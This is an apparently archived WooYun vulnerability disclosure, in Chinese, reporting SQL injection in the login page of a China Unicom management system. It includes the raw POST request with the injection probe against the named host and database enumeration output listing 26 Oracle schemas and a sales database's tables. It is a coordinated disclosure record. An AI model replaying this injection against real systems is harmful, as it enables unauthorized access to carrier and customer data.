当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128997

漏洞标题:联通某管理系统SQL注入(26个数据库)

相关厂商:中国联通

漏洞作者: fuzz-ing

提交时间:2015-07-24 22:56

修复时间:2015-09-12 09:48

公开时间:2015-09-12 09:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-29: 厂商已经确认,细节仅向厂商公开
2015-08-08: 细节向核心白帽子及相关领域专家公开
2015-08-18: 细节向普通白帽子公开
2015-08-28: 细节向实习白帽子公开
2015-09-12: 细节向公众公开

简要描述:

详细说明:

hzuni.com 分号直接报错,oracle数据库
注入点

POST /login.aspx HTTP/1.1
Content-Length: 273
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hzuni.com:80/
Cookie: ASP.NET_SessionId=dkyh4uargkdmq2jxliodf0og
Host: www.hzuni.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
k_dl=%b5%c7%20%c2%bd&k_oper_no=1&k_password=1'%22&__EVENTVALIDATION=/wEWBQLB2p2YAgK//IzYCAK7q7GGCAKv8qzaCAK7mcHoBdUdQobtzDCauXy6ZUoLxbWt8NyRLjGVjEaWs6dlEMN0&__VIEWSTATE=/wEPDwUJMTg4MDQ2NzE3ZGTyjyjn0%2bEPTAtNrvNvPUg2wPaZaro0e9743TDSuBngrA%3d%3d&__VIEWSTATEGENERATOR=C2EE9ABB


26个数据库

[*] APEX_030200
[*] APP_CY
[*] APPQOSSYS
[*] BS_TEST
[*] BUS_SALE
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HZAPP
[*] LBACSYS
[*] LOCAL_CDC
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] REPORT
[*] SALARY
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZHWJ_MOB


一个渠道数据库中的表,见下证明

漏洞证明:

Database: BUS_SALE
[75 tables]
+--------------------------+
| BS_AGENT_INFO            |
| BS_AGENT_INFO_TRADE      |
| BS_CARD_ASSIGN_LOG       |
| BS_CARD_ASSIGN_LOG_TEMP  |
| BS_CARD_IDLE             |
| BS_CARD_IDLE_TEMP        |
| BS_CARD_PINT             |
| BS_CARD_TEMP             |
| BS_CARD_USE              |
| BS_DATA_TEMP             |
| BS_DEV_INFO              |
| BS_DEV_INFO_TRADE        |
| BS_GRID_INFO             |
| BS_GRID_INFO_RELATION    |
| BS_ID_INFO               |
| BS_ID_INFO_TRADE         |
| BS_JF_PARA               |
| BS_JF_WRITEOFF           |
| BS_JF_WRITEOFF_TMP       |
| BS_LOG                   |
| BS_MAN_MOB_DEV_D         |
| BS_MONTH                 |
| BS_NET_CELL_INFO         |
| BS_NET_FILE              |
| BS_NET_INFO              |
| BS_NET_INFO_LOG          |
| BS_NET_INFO_NEW          |
| BS_NET_INFO_NEW_TRADE    |
| BS_ORDER                 |
| BS_ORDER_LOG             |
| BS_PACKAGE               |
| BS_PACKAGE_GOODS         |
| BS_PACKAGE_IDLE          |
| BS_PACKAGE_IDLE_TEMP     |
| BS_PACK_ORDER_STAT       |
| BS_PARENT_CHILD          |
| BS_PRODURE_LOG           |
| BS_QD_CLEAR              |
| BS_RELATION_DATA         |
| BS_RES_GRID_INFO         |
| BS_REW_APPLY_DATA        |
| BS_SALES_REPORT_M        |
| BS_SALE_CZ_M             |
| BS_SALE_PRODUCRE_LOG     |
| BS_SALE_YC_D             |
| BS_SELLER                |
| BS_SELLER_ACCOUNTDEPOSIT |
| BS_SELLER_SALES_REP_D    |
| BS_SELLER_TEMP           |
| BS_SELL_USERS            |
| BS_STOCK_SALES_REP_D     |
| BS_STOCK_SALES_REP_D_TMP |
| BS_STOCK_SALES_REP_M     |
| BS_STOCK_SALES_REP_M_TMP |
| BS_T0_REPORT_D           |
| BS_T0_REPORT_D_TEMP      |
| BS_T1_REPORT_D           |
| BS_T1_REPORT_D_TEMP      |
| BS_TASK_UNIT_INFO        |
| BS_TASK_UNIT_INFO_TRADE  |
| BS_TD_M_DEPART           |
| BS_TF_F_USER             |
| BS_TRADE                 |
| BS_TRADE_LOG             |
| BS_TRADE_SUB_ITEM        |
| BS_TRADE_SUB_ITEM_T      |
| BS_TRADE_T               |
| BS_YS_SALE               |
| HZ_AGENT_JF_RIGHT_MONTH  |
| HZ_CZ_DETAIL_LIST        |
| LJCH_TEMP                |
| TD_B_RESNUMRULE          |
| TF_R_SIMCARD_USE         |
| YJ_CARD_2G_ALL           |
| YJ_CARD_2G_CHECK         |
+--------------------------+

修复方案:

版权声明:转载请注明来源 fuzz-ing@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-29 09:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评论